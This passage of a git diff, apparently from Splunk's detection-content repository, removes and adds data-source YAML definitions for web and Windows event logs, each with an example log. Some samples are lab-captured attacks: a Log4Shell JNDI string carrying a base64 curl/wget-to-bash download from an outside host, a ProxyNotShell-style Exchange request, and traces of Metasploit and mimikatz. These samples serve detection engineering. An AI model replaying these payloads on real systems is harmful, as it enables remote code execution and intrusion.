-  (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36","request_body_len":0,"response_body_len":121,"status_code":404,"status_msg":"","tags":[],"resp_fuids":["FxuRnn2rNk2RjIfQQ8"],"resp_mime_types":["text/json"]}'
diff --git a/data_sources/web/Nginx_Access.yml b/data_sources/web/Nginx_Access.yml
deleted file mode 100644
index 4c30be7268..0000000000
--- a/data_sources/web/Nginx_Access.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-name: Nginx Access
-id: c716a418-eab3-4df5-9dff-5420174e3068
-author: Patrick Bareiss, Splunk
-source: /var/log/nginx/access.log
-sourcetype: nginx:plus:kv
-supported_TA: {}
-event_names: []
-fields:
-  - _time
-  - JSESSIONID
-  - action
-  - app
-  - bootstrapStatusProvider_applicationConfig_setupComplete
-  - bytes
-  - bytes_in
-  - bytes_out
-  - category
-  - charset
-  - cookie
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest
-  - dest_ip
-  - dest_port
-  - eventtype
-  - host
-  - http_content_type
-  - http_method
-  - http_referer
-  - http_user_agent
-  - http_user_agent_length
-  - http_x_forwarded_for
-  - http_x_header
-  - https
-  - index
-  - linecount
-  - nginx_version
-  - product
-  - protocol
-  - punct
-  - request_time
-  - response_time
-  - server
-  - site
-  - source
-  - sourcetype
-  - splunk_server
-  - src
-  - src_ip
-  - status
-  - status_description
-  - status_type
-  - tag
-  - tag::eventtype
-  - time_local
-  - timeendpos
-  - timestartpos
-  - uri_path
-  - uri_query
-  - url
-  - url_domain
-  - url_length
-  - vendor
-  - vendor_product
-  - version
-  - web_server
-example_log:
-  site="confluence.catjamfest.com" server="confluence.catjamfest.com" dest_port="80"
-  dest_ip="10.0.1.23" src="94.131.112.187" src_ip="94.131.112.187" user="-" time_local="22/Oct/2023:03:03:47
-  +0000" protocol="HTTP/1.1" status="200" bytes_out="7411" bytes_in="7378" http_referer="-"
-  http_user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
-  like Gecko) Chrome/89.0.4389.114 Safari/537.36" nginx_version="1.18.0" http_x_forwarded_for="-"
-  http_x_header="-" uri_query="bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2X5vPeiC6GfiUtoxFW0NDIKQv7i"
-  uri_path="/server-info.action" http_method="GET" response_time="0.060" cookie="JSESSIONID=E19F9F16ED5EC7869870D3E9E9E4F548"
-  request_time="0.059" category="text/html;charset=UTF-8" https=""
diff --git a/data_sources/web/Palo_Alto_Network_Threat.yml b/data_sources/web/Palo_Alto_Network_Threat.yml
deleted file mode 100644
index f939ef8a44..0000000000
--- a/data_sources/web/Palo_Alto_Network_Threat.yml
+++ /dev/null
@@ -1,34 +0,0 @@
-name: Palo Alto Network Threat
-id: 375c2b0e-d216-41ad-9406-200464595209
-author: Patrick Bareiss, Splunk
-source: pan:threat
-sourcetype: pan:threat
-supported_TA:
-  name: Palo Alto Networks Add-on for Splunk
-  version: 8.1.1
-  url: https://splunkbase.splunk.com/app/2757
-event_names: []
-fields:
-  - _time
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - host
-  - index
-  - linecount
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - timeendpos
-  - timestartpos
-example_log:
-  Feb 21 16:10:35 02.examplec.com 1,2023/02/21 16:10:35,016201013292,THREAT,file,2561,2023/02/21
-  16:10:35,6.1.1.2,5.2.1.1,6.1.1.2,5.2.1.1,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.2,zero,2023/02/21
-  16:10:35,685983,1,48598,443,48598,20077,0x1402000,tcp,alert,"payload.zip",ZIP(52004),allow-example-URL,low,client-to-server,7140821242043239124,0x8000000000000000,Germany,United
-  States,,,0,,,1,,,,,,,,0,177,204,178,197,,02,1.examplecorp.com/configWizard/keyUpload.jsp,,,,0,,0,,N/A,unknown,AppThreat-8677-7862,0x0,0,4294967295,,,be9fa539-d3c9-43f2-b1cb-ae2c91564e4f,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-02-21T16:10:35.249+00:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no
diff --git a/data_sources/web/Splunk_Stream_HTTP.yml b/data_sources/web/Splunk_Stream_HTTP.yml
deleted file mode 100644
index d6a2a49340..0000000000
--- a/data_sources/web/Splunk_Stream_HTTP.yml
+++ /dev/null
@@ -1,40 +0,0 @@
-name: Splunk Stream HTTP
-id: b0070a33-92ed-49e5-8f38-576cdf300710
-author: Patrick Bareiss, Splunk
-source: stream:http
-sourcetype: stream:http
-supported_TA:
-  name: Splunk App for Stream
-  version: 8.1.1
-  url: https://splunkbase.splunk.com/app/1809
-event_names: []
-fields:
-  - _time
-  - count
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest_ip
-  - endtime
-  - host
-  - index
-  - linecount
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - src_ip
-  - sum(bytes)
-  - sum(packets_in)
-  - sum(packets_out)
-  - timeendpos
-  - timestamp
-  - timestartpos
-  - values(flow_id){}
-  - vxlan_id
-example_log: ""
diff --git a/data_sources/web/Splunk_Stream_IP.yml b/data_sources/web/Splunk_Stream_IP.yml
deleted file mode 100644
index 3138184d0b..0000000000
--- a/data_sources/web/Splunk_Stream_IP.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-name: Splunk Stream IP
-id: c96f5906-f601-4f32-a26c-482535159bc2
-author: Patrick Bareiss, Splunk
-source: stream:ip
-sourcetype: stream:ip
-supported_TA:
-  name: Splunk App for Stream
-  version: 8.1.1
-  url: https://splunkbase.splunk.com/app/1809
-event_names: []
-fields:
-  - _time
-  - action
-  - app
-  - bytes
-  - bytes_in
-  - bytes_out
-  - category
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest
-  - dest_ip
-  - dest_port
-  - eventtype
-  - host
-  - http_content_type
-  - http_method
-  - http_referer
-  - http_referrer
-  - http_user_agent
-  - http_user_agent_length
-  - http_x_forwarded_for
-  - http_x_header
-  - https
-  - index
-  - linecount
-  - nginx_version
-  - product
-  - protocol
-  - punct
-  - request_time
-  - response_time
-  - server
-  - site
-  - source
-  - sourcetype
-  - splunk_server
-  - src
-  - src_ip
-  - status
-  - status_description
-  - status_type
-  - tag
-  - tag::eventtype
-  - time_local
-  - timeendpos
-  - timestartpos
-  - uri_path
-  - url
-  - url_domain
-  - url_length
-  - vendor
-  - vendor_product
-  - version
-  - web_server
-example_log:
-  site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1"
-  src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000"
-  protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]"
-  http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-"
-  uri_query="-" uri_path="/" http_method="GET" response_time="0.004" cookie="-" request_time="0.004"
-  category="application/json" https=""
diff --git a/data_sources/web/Windows_IIS.yml b/data_sources/web/Windows_IIS.yml
deleted file mode 100644
index 7ed74c0689..0000000000
--- a/data_sources/web/Windows_IIS.yml
+++ /dev/null
@@ -1,37 +0,0 @@
-name: Windows IIS
-id: d6f31fda-702c-431d-a378-9bf096529764
-author: Patrick Bareiss, Splunk
-source: ms:iis:splunk
-sourcetype: ms:iis:splunk
-separator: None
-supported_TA: {}
-event_names: []
-fields:
-- _time
-- CorrelationID
-- Email
-- X_Rps_CAT
-- cafeReqId
-- charset
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- exchangecookie
-- host
-- index
-- linecount
-- punct
-- source
-- sourcetype
-- splunk_server
-- timeendpos
-- timestartpos
-example_log: 2022-10-03 17:58:25 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json
-  @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=<empty>;&cafeReqId=985523e1-c41a-49eb-aa80-b15405b78ef5;
-  443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499
-  - 100.21.120.14 200 0 0 2384 2125 433 - application/soap+xml;charset=UTF-8 on
diff --git a/data_sources/endpoint/Windows_Active_Directory_Admon.yml b/data_sources/windows_active_directory_admon.yml
similarity index 93%
rename from data_sources/endpoint/Windows_Active_Directory_Admon.yml
rename to data_sources/windows_active_directory_admon.yml
index a0517404e8..59abc1131f 100644
--- a/data_sources/endpoint/Windows_Active_Directory_Admon.yml
+++ b/data_sources/windows_active_directory_admon.yml
@@ -1,13 +1,15 @@
 name: Windows Active Directory Admon
 id: 22bbf4e4-d313-43c1-98ee-808b8775519d
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Windows Active Directory Admon
 source: ActiveDirectory
 sourcetype: ActiveDirectory
 supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
+- name: Splunk Add-on for Microsoft Windows
   url: https://splunkbase.splunk.com/app/742
-event_names: []
+  version: 8.8.0
 fields:
 - _time
 - Guid
diff --git a/data_sources/windows_event_log_application_2282.yml b/data_sources/windows_event_log_application_2282.yml
new file mode 100644
index 0000000000..f7d9a9569e
--- /dev/null
+++ b/data_sources/windows_event_log_application_2282.yml
@@ -0,0 +1,70 @@
+name: Windows Event Log Application 2282
+id: 4490537e-5e0c-46f7-9209-f56f852aa237
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Application 2282
+source: XmlWinEventLog:Application
+sourcetype: XmlWinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- ModuleDll
+- Name
+- Opcode
+- ProcessID
+- ProcessorArchitecture
+- Qualifiers
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-IIS-W3SVC-WP' Guid='{670080D9-742A-4187-8D16-41143D1290BD}'
+  EventSourceName='W3SVC-WP'/><EventID Qualifiers='49152'>2282</EventID><Version>0</Version><Level>2</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x80000000000000</Keywords><TimeCreated
+  SystemTime='2022-12-20T15:58:25.325383600Z'/><EventRecordID>1001307</EventRecordID><Correlation/><Execution
+  ProcessID='0' ThreadID='0'/><Channel>Application</Channel><Computer>win-dc-exch01.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='ModuleDll'>c:\temp\msf.dll</Data><Data Name='ProcessorArchitecture'>AMD64</Data><Binary>C1000000</Binary></EventData></Event>
diff --git a/data_sources/windows_event_log_application_3000.yml b/data_sources/windows_event_log_application_3000.yml
new file mode 100644
index 0000000000..2415bb058a
--- /dev/null
+++ b/data_sources/windows_event_log_application_3000.yml
@@ -0,0 +1,66 @@
+name: Windows Event Log Application 3000
+id: 3911945d-9222-408d-b851-9b1bce4c2d24
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Application 3000
+source: XmlWinEventLog:Application
+sourcetype: XmlWinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- param1
+- param2
+- param3
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-ProcessExitMonitor' Guid='{FD771D53-8492-4057-8E35-8C02813AF49B}'
+  EventSourceName='Process Exit Monitor'/><EventID Qualifiers='16384'>3000</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x80000000000000</Keywords><TimeCreated
+  SystemTime='2022-09-08T18:21:27.155712000Z'/><EventRecordID>21334</EventRecordID><Correlation/><Execution
+  ProcessID='0' ThreadID='0'/><Channel>Application</Channel><Computer>win-host-mhaag-attack-range-117</Computer><Security
+  UserID='S-1-5-21-62830434-419094169-3251522898-500'/></System><EventData Name='EVENT_PROCESSTERMINATION_SELF'><Data
+  Name='param1'>C:\Windows\System32\klist.exe</Data><Data Name='param2'>0</Data><Data
+  Name='param3'>01d8c3afcf370d13</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_capi2_70.yml b/data_sources/windows_event_log_capi2_70.yml
new file mode 100644
index 0000000000..173081847f
--- /dev/null
+++ b/data_sources/windows_event_log_capi2_70.yml
@@ -0,0 +1,70 @@
+name: Windows Event Log CAPI2 70
+id: 821de0a6-c5b4-491b-a27e-187552792817
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log CAPI2 70
+source: XmlWinEventLog:Microsoft-Windows-CAPI2/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-CAPI2' Guid='{5bbca4a8-b209-48dc-a8c7-b23d3e5216fb}'/><EventID>70</EventID><Version>0</Version><Level>4</Level><Task>70</Task><Opcode>0</Opcode><Keywords>0x4000000000000080</Keywords><TimeCreated
+  SystemTime='2023-02-09T20:57:21.815339400Z'/><EventRecordID>308332</EventRecordID><Correlation/><Execution
+  ProcessID='3680' ThreadID='212'/><Channel>Microsoft-Windows-CAPI2/Operational</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security
+  UserID='S-1-5-21-2690122726-1172718210-436210976-500'/></System><UserData><CryptAcquireCertificatePrivateKey><Certificate
+  fileRef='5A752C9207730D787A9AF0A11FDFD59F68A6EB8C.cer' subjectName='test.atomic.com'/><Flags
+  value='10001' CRYPT_ACQUIRE_CACHE_FLAG='true' CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG='true'/><EventAuxInfo
+  ProcessName='rundll32.exe'/><CorrelationAuxInfo TaskId='{09F7E1D8-FE03-4AFA-8B1F-A38A574E44C9}'
+  SeqNumber='2'/><Result value='0'/></CryptAcquireCertificatePrivateKey></UserData></Event>
diff --git a/data_sources/windows_event_log_capi2_81.yml b/data_sources/windows_event_log_capi2_81.yml
new file mode 100644
index 0000000000..8bca7cbb19
--- /dev/null
+++ b/data_sources/windows_event_log_capi2_81.yml
@@ -0,0 +1,80 @@
+name: Windows Event Log CAPI2 81
+id: 463ff898-8135-4c0e-811e-f8629dfc5027
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log CAPI2 81
+source: XmlWinEventLog:Microsoft-Windows-CAPI2/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-CAPI2' Guid='{5bbca4a8-b209-48dc-a8c7-b23d3e5216fb}'/><EventID>81</EventID><Version>0</Version><Level>2</Level><Task>80</Task><Opcode>2</Opcode><Keywords>0x4000000000000040</Keywords><TimeCreated
+  SystemTime='2023-10-10T21:05:45.047550700Z'/><EventRecordID>2400597</EventRecordID><Correlation/><Execution
+  ProcessID='2424' ThreadID='2868'/><Channel>Microsoft-Windows-CAPI2/Operational</Channel><Computer>mswin-server.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><UserData><WinVerifyTrust><ActionID>{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}</ActionID><UIChoice
+  value='2'>WTD_UI_NONE</UIChoice><RevocationCheck value='0'/><StateAction value='1'>WTD_STATEACTION_VERIFY</StateAction><Flags
+  value='80001000' WTD_CACHE_ONLY_URL_RETRIEVAL='true' CPD_USE_NT5_CHAIN_FLAG='true'/><FileInfo
+  filePath='C:\Users\Administrator\Downloads\metatwin-master\metatwin-master\20231010_210331\20231010_210331_signed_mimikatz.exe'
+  hasFileHandle='true'/><DigestInfo digestAlgorithm='SHA256' digest='140E97430439F7B8E2332E928581996A701C28D3D33FBC80BCAA2F731F9FEE8D'/><RegPolicySetting
+  value='23C00' WTPF_OFFLINEOK_IND='true' WTPF_OFFLINEOK_COM='true' WTPF_OFFLINEOKNBU_IND='true'
+  WTPF_OFFLINEOKNBU_COM='true' WTPF_IGNOREREVOCATIONONTS='true'/><SignatureSettingsFlags
+  value='20000000' WSS_OUT_FILE_SUPPORTS_SEAL='true'/><SignerInfo><DigestAlgorithm
+  oid='2.16.840.1.101.3.4.2.1' hashName='SHA256'/></SignerInfo><CertificateChain chainRef='{D7D21F37-6E0D-440C-9DF2-E73BC40CD4BF}'/><TimestampInfo
+  format='RFC 3161'><DigestAlgorithm oid='2.16.840.1.101.3.4.2.1' hashName='SHA256'/><SignTime>2021-01-07T23:21:42.655Z</SignTime></TimestampInfo><TimestampChain
+  chainRef='{2BDF7F75-D825-45BA-BC57-1F5E52274842}'/><StepError stepID='32' stepName='TRUSTERROR_STEP_FINAL_OBJPROV'><Result
+  value='80096010'>The digital signature of the object did not verify.</Result></StepError><EventAuxInfo
+  ProcessName='sysmon64.exe'/><CorrelationAuxInfo TaskId='{44B713F2-FA74-49B2-B3C1-99E5FD2F1667}'
+  SeqNumber='9'/><Result value='80096010'>The digital signature of the object did
+  not verify.</Result></WinVerifyTrust></UserData></Event>
diff --git a/data_sources/windows_event_log_certificateservicesclient_1007.yml b/data_sources/windows_event_log_certificateservicesclient_1007.yml
new file mode 100644
index 0000000000..2eb2327c11
--- /dev/null
+++ b/data_sources/windows_event_log_certificateservicesclient_1007.yml
@@ -0,0 +1,72 @@
+name: Windows Event Log CertificateServicesClient 1007
+id: c51444e3-479d-4c4a-b111-e8276a3acf39
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log CertificateServicesClient 1007
+source: XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational
+sourcetype: XmlWinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-CertificateServicesClient-Lifecycle-System' Guid='{bc0669e1-a10d-4a78-834e-1ca3c806c93b}'/><EventID>1007</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2023-02-01T17:08:44.1466587Z'/><EventRecordID>2</EventRecordID><Correlation
+  ActivityID='{3b615f97-365d-0000-130d-623b5d36d901}'/><Execution ProcessID='7716'
+  ThreadID='8384'/><Channel>Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational</Channel><Computer>DESKTOP-92OQLA1</Computer><Security
+  UserID='S-1-5-21-2334826781-4204571024-2242252149-1000'/></System><UserData><CertNotificationData
+  ProcessName='powershell.exe' AccountName='DESKTOP-92OQLA1\Michael Haag' Context='Machine'><CertificateDetails
+  Thumbprint='1ee3cb11c0937a0940d8633fbece475b76a04833'><SubjectNames><SubjectName>CN=test.atomic.com</SubjectName><SubjectName>test.atomic.com</SubjectName></SubjectNames><EKUs><EKU
+  Name='Client Authentication' OID='1.3.6.1.5.5.7.3.2'/><EKU Name='Server Authentication'
+  OID='1.3.6.1.5.5.7.3.1'/></EKUs><NotValidAfter>2024-02-01T17:18:09Z</NotValidAfter></CertificateDetails></CertNotificationData></UserData></Event>
diff --git a/data_sources/windows_event_log_defender_1121.yml b/data_sources/windows_event_log_defender_1121.yml
new file mode 100644
index 0000000000..6e83bfaa1e
--- /dev/null
+++ b/data_sources/windows_event_log_defender_1121.yml
@@ -0,0 +1,83 @@
+name: Windows Event Log Defender 1121
+id: 84a254c5-7900-4b52-a324-a176adb7c11d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 1121
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- Detection_Time
+- Engine_Version
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- ID
+- Inhertiance_Flags
+- Involved_File
+- Keywords
+- Level
+- Name
+- New_Value
+- Old_Value
+- Opcode
+- Parent_Commandline
+- Path
+- ProcessID
+- Process_Name
+- Product_Name
+- Product_Version
+- RecordNumber
+- RuleType
+- Security_intelligence_Version
+- SystemTime
+- System_Props_Xml
+- Target_Commandline
+- Task
+- ThreadID
+- User
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Windows Defender' Guid='{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}'/><EventID>1121</EventID><Version>0</Version><Level>3</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2023-11-20T16:29:48.9847638Z'/><EventRecordID>2975</EventRecordID><Correlation
+  ActivityID='{fb36f2d9-5b89-4566-8af5-7c1212b4797f}'/><Execution ProcessID='3488'
+  ThreadID='7496'/><Channel>Microsoft-Windows-Windows Defender/Operational</Channel><Computer>researchvmhaa</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='Product Name'>Microsoft Defender
+  Antivirus</Data><Data Name='Product Version'>4.18.23100.2009</Data><Data Name='Unused'></Data><Data
+  Name='ID'>3B576869-A4EC-4529-8536-B80A7769E899</Data><Data Name='Detection Time'>2023-11-20T16:29:48.984Z</Data><Data
+  Name='User'>researchvmhaa\research</Data><Data Name='Path'>C:\Users\research\AppData\Local\Temp\script.vbs</Data><Data
+  Name='Process Name'>C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data><Data
+  Name='Security intelligence Version'>1.401.912.0</Data><Data Name='Engine Version'>1.1.23100.2009</Data><Data
+  Name='RuleType'>ENT\ConsR</Data><Data Name='Target Commandline'></Data><Data Name='Parent
+  Commandline'>"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" </Data><Data
+  Name='Involved File'></Data><Data Name='Inhertiance Flags'>0x00000000</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_defender_1122.yml b/data_sources/windows_event_log_defender_1122.yml
new file mode 100644
index 0000000000..214fdd95e7
--- /dev/null
+++ b/data_sources/windows_event_log_defender_1122.yml
@@ -0,0 +1,79 @@
+name: Windows Event Log Defender 1122
+id: 4a2d0499-f489-4557-82f4-f357025cf3e7
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 1122
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- Detection_Time
+- Engine_Version
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- ID
+- Inhertiance_Flags
+- Keywords
+- Level
+- Name
+- Opcode
+- Parent_Commandline
+- Path
+- ProcessID
+- Process_Name
+- Product_Name
+- Product_Version
+- RecordNumber
+- RuleType
+- Security_intelligence_Version
+- SystemTime
+- System_Props_Xml
+- Target_Commandline
+- Task
+- ThreadID
+- User
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Windows Defender' Guid='{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}'/><EventID>1122</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2023-11-26T23:43:08.7101401Z'/><EventRecordID>3701</EventRecordID><Correlation
+  ActivityID='{b68511a1-ec5f-4bc7-a9bb-2bd601338de2}'/><Execution ProcessID='3512'
+  ThreadID='5936'/><Channel>Microsoft-Windows-Windows Defender/Operational</Channel><Computer>researchvmhaa</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='Product Name'>Microsoft Defender
+  Antivirus</Data><Data Name='Product Version'>4.18.23100.2009</Data><Data Name='Unused'></Data><Data
+  Name='ID'>E6DB77E5-3DF2-4CF1-B95A-636979351E5B</Data><Data Name='Detection Time'>2023-11-26T23:43:08.709Z</Data><Data
+  Name='User'>(unknown user)</Data><Data Name='Path'></Data><Data Name='Process Name'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data
+  Name='Security intelligence Version'>1.401.1247.0</Data><Data Name='Engine Version'>1.1.23100.2009</Data><Data
